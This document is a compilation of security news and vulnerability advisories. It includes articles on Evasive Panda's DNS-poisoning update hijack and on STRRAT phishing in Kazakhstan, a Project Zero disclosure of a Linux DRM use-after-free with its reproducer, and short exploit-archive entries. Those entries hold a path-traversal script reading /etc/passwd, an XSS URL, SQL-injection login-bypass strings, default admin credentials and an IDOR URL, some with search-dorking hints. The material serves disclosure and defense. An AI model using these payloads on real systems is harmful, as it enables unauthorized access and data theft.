The APT used DNS poisoning to install the Macma backdoor on targeted networks and then deliver malware to steal data via post-exploitation activity.

Source: Pawel Opaska via Alamy Stock Photo

Researchers have found that a China-linked advanced persistent threat (APT) group compromised an Internet service provider (ISP) to exploit software vendor update mechanisms using DNS poisoning. The attacks delivered new variants of the Macma backdoor, as well as post-exploitation malware to exfiltrate sensitive data from compromised networks.

Researchers at Volexity discovered the attack by Evasive Panda, a threat group they track as StormBamboo and that also goes by DaggerFly, when they detected multiple systems becoming infected with malware in mid-2023, they revealed in a recent blog post. The researchers eventually tracked the attacks to the highly active Chinese APT, which they found altering DNS query responses for specific domains tied to automatic software update channels for software vendors, they said.

"StormBamboo appeared to target software that used insecure update mechanisms, such as HTTP, and did not properly validate digital signatures of installers," Volexity researchers Ankur Saini, Paul Rascagneres, Steven Adair, and Thomas Lancaster wrote in the post. "Therefore, when these applications went to retrieve their updates, instead of installing the intended update, they would install malware, including but not limited to Macma and Pocostick (aka MGBot)."

Macma is a backdoor that's often used by Evasive Panda and was first detailed by Google TAG in 2021, though it was used for a number of years before discovery. The latest variant demonstrates the group converging development of both Macma and Gimmick MacOS malware, according to Volexity. The researchers also detected post-exploitation activity to deploy the malicious browser extension Reloadext to exfiltrate victim mail data, they said.

**Poisoning DNS Requests**

Volexity outlined one of several incidents that researchers investigated in which Evasive Panda used DNS poisoning to deliver malware via an HTTP automatic update mechanism. The attack poisoned responses for legitimate hostnames that were then used as second-stage command-and-control (C2) servers, the researchers said.

DNS poisoning is a type of DNS abuse in which an attacker poisons DNS records to reroute network communications to a server under their control to steal and manipulate information transmitted to users. In this case, the APT used the poisoned DNS records to resolve to an attacker-controlled server in Hong Kong at IP address 103.96.130.107, which was at the ISP level of the targeted organization.

The logic behind the abuse of automatic updates is the same for all the applications targeted, the researchers noted. The legitimate application performs an HTTP request to retrieve a text-based file containing the latest application version and a link to the installer.

"Since the attacker has control of the DNS responses for any given DNS name, they abuse this design, redirecting the HTTP request to a C2 server they control hosting a forged text file and a malicious installer," the researchers wrote.

In the attacks, the APT targeted multiple software vendors with "insecure update workflows" that use varying levels of complexity in their steps for pushing malware. For example, one of the vendors, 5Kplayer, uses a workflow, the binary of which automatically checks if a new version of YoutubeDL is available for each time the application is started.

If a new version is available, the process downloads it from the specified URL, and then the legitimate app executes it. In its attack, Evasive Panda used DNS poisoning to host a modified config file indicating a new update was available, which resulted in the YoutubeDL software downloading an upgrade package from the APT's server that had already been backdoored with malicious code.

**Beware: "Highly Skilled" APT at Work**

Volexity notified and worked with the ISP whose network was being used for DNS poisoning. The ISP investigated and took various network components offline, which stopped the malicious activity, the researchers said.

"During this time, it was not possible to pinpoint a specific device that was compromised, but various components of the infrastructure were updated or left offline and the activity ceased," they wrote.

The attacks are not the first time Evasive Panda, which often targets organizations across Asia that are interested in the Chinese state, has leveraged legit software update channels for nefarious purposes.

In April of last year, researchers from ESET discovered cyberespionage attacks in which the group targeted individuals in China and Nigeria by hijacking update channels for software developed by Chinese companies to deliver the MGBot malware to steal credentials and data.

Indeed, the group is "a highly skilled and aggressive threat actor" that often "compromises third parties to breach intended targets," the researchers warned.

"The variety of malware employed in various campaigns by this threat actor indicates significant effort is invested, with actively supported payloads for not only macOS and Windows, but also network appliances," they wrote.

The attacks also are related to previous research by ESET concerning the infection vector for the Pocostick malware that also used DNS poisoning to abuse automatic updates, as well as one used by a related APT DriftingBamboo following zero-day exploitation of Sophos firewalls, the researchers noted.

Volexity included a link to various rules and indicators of compromise (IOCs) in its post to help organizations detect if they have been affected by the malicious activity.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

China's Evasive Panda Attacks ISP to Send Malicious Software Updates

Linux DRM has drm_file_update_pid() call to get_pid() too late, which creates a race condition that can lead to use-after-free issue of a struct pid.

Linux: DRM: refcount incremented too late in drm_file_update_pid()

[I am sending this to security@ and to the drm-misc maintainers - based on https://drm.pages.freedesktop.org/maintainer-tools/committer-drm-misc.html#merge-criteria I think this falls into drm-misc's area of responsibility?]

=== summary ===  
drm_file_update_pid() calls get_pid() too late, which creates a race  
condition that can lead to use-after-free of a `struct pid`.

I will send a suggested patch off-list in a minute; let me know if you want me to resend it on the dri-devel list in case that works better for you.

=== verbose bug report ===  
drm_file_update_pid() contains the following code:

```  
  struct drm_device *dev;  
  struct pid *pid, *old;

  /*  
   * Master nodes need to keep the original ownership in order for  
   * drm_master_check_perm to keep working correctly. (See comment in  
   * drm_auth.c.)  
   */  
  if (filp->was_master)  
          return;

  pid = task_tgid(current);

  [...]

  dev = filp->minor->dev;  
  mutex_lock(&dev->filelist_mutex);  
  old = rcu_replace_pointer(filp->pid, pid, 1);  
  mutex_unlock(&dev->filelist_mutex);

  if (pid != old) {  
          get_pid(pid);  
          synchronize_rcu();  
          put_pid(old);  
  }  
```

filp->pid is a refcounted pointer which can only be modified under  
dev->filelist_mutex.  
After calling rcu_replace_pointer(), we have a refcount debt of 1, which is  
still fine because we're holding the mutex that prevents other tasks from  
taking ownership of the reference stored in filp->pid; but by the time we drop  
this mutex, we must have called get_pid() to make up for this refcount debt,  
and that isn't done.

So a use-after-free can occur in the following scenario, assuming filp->pid  
initially points to the pid of process A and process B's initial pid refcount  
is 1:

process A               process B  
=========               =========  
                        begin drm_file_update_pid  
                        mutex_lock(&dev->filelist_mutex)  
                        rcu_replace_pointer(filp->pid, <pid B>, 1)  
                        mutex_unlock(&dev->filelist_mutex)  
begin drm_file_update_pid  
mutex_lock(&dev->filelist_mutex)  
rcu_replace_pointer(filp->pid, <pid A>, 1)  
mutex_unlock(&dev->filelist_mutex)  
get_pid(<pid A>)  
synchronize_rcu()  
put_pid(<pid B>)   *** pid B reaches refcount 0 and is freed here ***  
                        get_pid(<pid B>)   *** UAF ***  
                        synchronize_rcu()  
                        put_pid(<pid A>)

Note that this race can only occur if RCU is configured so that  
running in preemptible task context can count as an RCU quiescent state.  
My testcase assumes that the kernel is configured for full preemption (meaning  
either CONFIG_PREEMPT=y or CONFIG_PREEMPT_DYNAMIC=y with full preemption  
selected at boot time); however, I think in theory the bug can probably be  
hit as long as CONFIG_PREEMPT_RCU=y is enabled (which is the case on kernel  
builds with dynamic preemption), since I think on such builds, expedited grace  
periods can still detect RCU quiescent states with IPIs.

My reproducer also requires that you patch the following code into the kernel  
to slow down execution and make the bug easy to trigger:

```  
diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c  
index 638ffa4444f5..03e7711e9744 100644  
--- a/drivers/gpu/drm/drm_file.c  
+++ b/drivers/gpu/drm/drm_file.c  
@@ -38,6 +38,7 @@  
 #include <linux/pci.h>  
 #include <linux/poll.h>  
 #include <linux/slab.h>  
+#include <linux/delay.h>

 #include <drm/drm_client.h>  
 #include <drm/drm_drv.h>  
@@ -472,6 +473,12 @@ void drm_file_update_pid(struct drm_file *filp)  
        old = rcu_replace_pointer(filp->pid, pid, 1);  
        mutex_unlock(&dev->filelist_mutex);

+       if (strcmp(current->comm, \"SLOWME\") == 0) {  
+               pr_warn(\"%s: BEGIN DELAY\  
\", __func__);  
+               mdelay(1000);  
+               pr_warn(\"%s: END DELAY\  
\", __func__);  
+       }  
+  
        if (pid != old) {  
                get_pid(pid);  
                synchronize_rcu();  
```

The reproducer code:  
```  
#include <unistd.h>  
#include <stdio.h>  
#include <err.h>  
#include <fcntl.h>  
#include <stdlib.h>  
#include <sys/signal.h>  
#include <sys/ioctl.h>  
#include <sys/prctl.h>  
#include <sys/wait.h>  
#include <drm/drm.h>

#define SYSCHK(x) ({          \\  
  typeof(x) __res = (x);      \\  
  if (__res == (typeof(x))-1) \\  
    err(1, \"SYSCHK(\" #x \")\"); \\  
  __res;                      \\  
})

static void main_test_code() {  
  struct drm_version dummy_version;

  int drm_fd = SYSCHK(open(\"/dev/dri/renderD128\", O_RDONLY));  
  int child = SYSCHK(fork());

  if (child == 0) {  
    /* child process */  
    prctl(PR_SET_NAME, \"SLOWME\");  
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version); // delay injected here  
  } else {  
    /* parent process */  
    usleep(200*1000);  
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version);  
  }

  if (child == 0) {  
    /* child process */  
    exit(0);  
  } else {  
    /* parent process */  
    int status = 0;  
    pid_t child = wait(&status);  
    printf(\"wait() returned %d, status %d\  
\", child, status);  
    exit(0);  
  }  
}

int main(void) {  
  // run in a child process to avoid extra references from job control or such  
  int child = SYSCHK(fork());  
  if (child == 0) {  
    prctl(PR_SET_PDEATHSIG, SIGKILL);  
    main_test_code();  
  } else {  
    int status = 0;  
    pid_t child = wait(&status);  
    printf(\"wait() returned %d, status %d\  
\", child, status);  
  }  
}  
```

The resulting KASAN splat (tested on mainline plus the race widener patch  
above, with CONFIG_PREEMPT=y and CONFIG_KASAN=y):  
```  
 ==================================================================  
 BUG: KASAN: slab-use-after-free in drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))  
 Write of size 4 at addr ffff88811f2f68c0 by task SLOWME/1092

 CPU: 3 PID: 1092 Comm: SLOWME Not tainted 6.10.0-rc5-00035-gafcd48134c58-dirty #384  
 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014  
 Call Trace:  
  <TASK>  
 dump_stack_lvl (lib/dump_stack.c:117)  
 print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)  
 kasan_report (mm/kasan/report.c:603)  
 kasan_check_range (mm/kasan/generic.c:175 (discriminator 1) mm/kasan/generic.c:189 (discriminator 1))  
 drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))  
 drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)  
 drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)  
 __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)  
[...]  
  </TASK>

 Allocated by task 1091:  
 kasan_save_stack (mm/kasan/common.c:48)  
 kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))  
 __kasan_slab_alloc (mm/kasan/common.c:312 mm/kasan/common.c:338)  
 kmem_cache_alloc_noprof (./include/linux/kasan.h:201 mm/slub.c:3940 mm/slub.c:4002 mm/slub.c:4009)  
 alloc_pid (kernel/pid.c:187)  
 copy_process (kernel/fork.c:2406)  
 kernel_clone (./include/linux/random.h:26 kernel/fork.c:2798)  
 __do_sys_clone (kernel/fork.c:2929)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

 Freed by task 1091:  
 kasan_save_stack (mm/kasan/common.c:48)  
 kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))  
 kasan_save_free_info (mm/kasan/generic.c:582 (discriminator 1))  
 poison_slab_object (mm/kasan/common.c:242)  
 __kasan_slab_free (mm/kasan/common.c:256 (discriminator 1))  
 kmem_cache_free (mm/slub.c:4438 (discriminator 3) mm/slub.c:4513 (discriminator 3))  
 put_pid.part.0 (kernel/pid.c:122)  
 drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)  
 drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)  
 __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

 The buggy address belongs to the object at ffff88811f2f68c0  
  which belongs to the cache pid of size 240  
 The buggy address is located 0 bytes inside of  
  freed 240-byte region [ffff88811f2f68c0, ffff88811f2f69b0)

 The buggy address belongs to the physical page:  
 page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11f2f6  
 head: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0  
 flags: 0x200000000000040(head|node=0|zone=2)  
 page_type: 0xffffefff(slab)  
 raw: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000  
 raw: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000  
 head: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000  
 head: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000  
 head: 0200000000000001 ffffea00047cbd81 ffffffffffffffff 0000000000000000  
 head: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000  
 page dumped because: kasan: bad access detected

 Memory state around the buggy address:  
  ffff88811f2f6780: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
  ffff88811f2f6800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc  
 >ffff88811f2f6880: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb  
                                            ^  
  ffff88811f2f6900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
  ffff88811f2f6980: fb fb fb fb fb fb fc fc fc fc fc fc fc fc fc fc  
 ==================================================================  
```

=== disclosure deadline ===  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2024-09-25.

For more details, see the Project Zero vulnerability disclosure policy:  
https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-  
policy.html

Related CVE Numbers: CVE-2024-39486.

Found by: jannh@google.com

Linux DRM drm_file_update_pid() Race Condition / Use-After-Free

Devika version 1 suffers from a path traversal vulnerability.

    # Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter# Google Dork: N/A# Date: 2024-06-29# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/X)# Vendor Homepage: https://devikaai.co/# Software Link: https://github.com/stitionai/devika# Version: v1# Tested on: Windows 11 Home Edition# CVE: CVE-2024-40422#!/usr/bin/pythonimport argparseimport requestsdef exploit(target_url):    url = f'http://{target_url}/api/get-browser-snapshot'    params = {        'snapshot_path': '../../../../etc/passwd'    }    response = requests.get(url, params=params)    print(response.text)if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)    args = parser.parse_args()    exploit(args.target)

Devika 1 Path Traversal

e107 version 2.3.3 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : e107 v2.3.3 XSS Vulnerability                                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://unlimited.dl.sourceforge.net/project/e107/e107/e107%20v2.3.3/e107_2.3.3_full.zip?viasf=1                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1[+] LOgin : http://127.0.0.1/233/e107_admin/[+] http://127.0.0.1/233/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

e107 2.3.3 Cross Site Scripting

Codeprojects E-Commerce version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Codeprojects E-Commerce v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/?s=Ecommerce                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@admin.com & pass = password[+] https://www/127.0.0.1/demo/comdeptcmru.acth/59143214/admin/products.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Codeprojects E-Commerce 1.0 Insecure Settings

Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Blog Site 1.0 Auth By Pass Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1//blog/admin/index.php?page=manage_postGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 SQL Injection

Best Courier Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Best Courier Management System v1.0 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user : 'or''='@gmail.com & pass = 'or''='[+] Panel : http://127.0.0.1/gaatitrack/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Best Courier Management System 1.0 SQL Injection

Appointment Scheduler version 4.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v4.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/AppointmentSchedulerDe/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 4.0 Insecure Direct Object Reference

Organizations in Kazakhstan are the target of a threat activity cluster dubbed Bloody Wolf that delivers a commodity malware called STRRAT (aka Strigoi Master).
"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.
The cyber attacks employ

Network Security / Threat Intelligence

Organizations in Kazakhstan are the target of a threat activity cluster dubbed **Bloody Wolf** that delivers a commodity malware called STRRAT (aka Strigoi Master).

"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.

The cyber attacks employ phishing emails as an initial access vector, impersonating the Ministry of Finance of the Republic of Kazakhstan and other agencies to trick recipients into opening PDF attachments.

The file purports to be a non-compliance notice and contains links to a malicious Java archive (JAR) file as well as an installation guide for the Java interpreter necessary for the malware to function.

In an attempt to lend legitimacy to the attack, the second link points to a web page associated with the country's government website that urges visitors to install Java in order to ensure that the portal is operational.

The STRRAT malware, hosted on a website that mimics the website of the Kazakhstan government ("egov-kz\[.\]online"), sets up persistence on the Windows host by means of a Registry modification and runs the JAR file every 30 minutes.

What's more, a copy of the JAR file is copied to the Windows startup folder to ensure that it automatically launches after a system reboot.

Subsequently, it establishes connections with a Pastebin server to exfiltrate sensitive information from the compromised machine, including details about operating system version and antivirus software installed, and account data from Google Chrome, Mozilla Firefox, Internet Explorer, Foxmail, Outlook, and Thunderbird.

It's also designed to receive additional commands from the server to download and execute more payloads, log keystrokes, run commands using cmd.exe or PowerShell, restart or shut down the system, install a proxy, and remove itself.

"Using less common file types such as JAR enables the attackers to bypass defenses," BI.ZONE said. "Employing legitimate web services such as Pastebin to communicate with the compromised system makes it possible to evade network security solutions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Kazakh Organizations Targeted by 'Bloody Wolf' Cyber Attacks

A list of topics we covered in the week of July 29 to August 4 of 2024

August 2, 2024 - The FBI warns about scammers that impersonate employees of cryptocurrrency exchanges as a means to defraud victims

July 31, 2024 - Meta has settled a Texas lawsuit over gathering biometric data for Facebook's "Tag Suggestions" feature without informed consent.

July 31, 2024 - Apple has released security updates that patch vulnerabilities in Siri and VoiceOver that could be used to access sensitive user data.

July 30, 2024 - Only trust official sources they say, but what happens when a Google vetted ad is for a Google product?

July 29, 2024 - This week on the Lock and Code podcast, we speak with Jess Dodson about SIEM selection, management, and proper data collection.

Tag

#google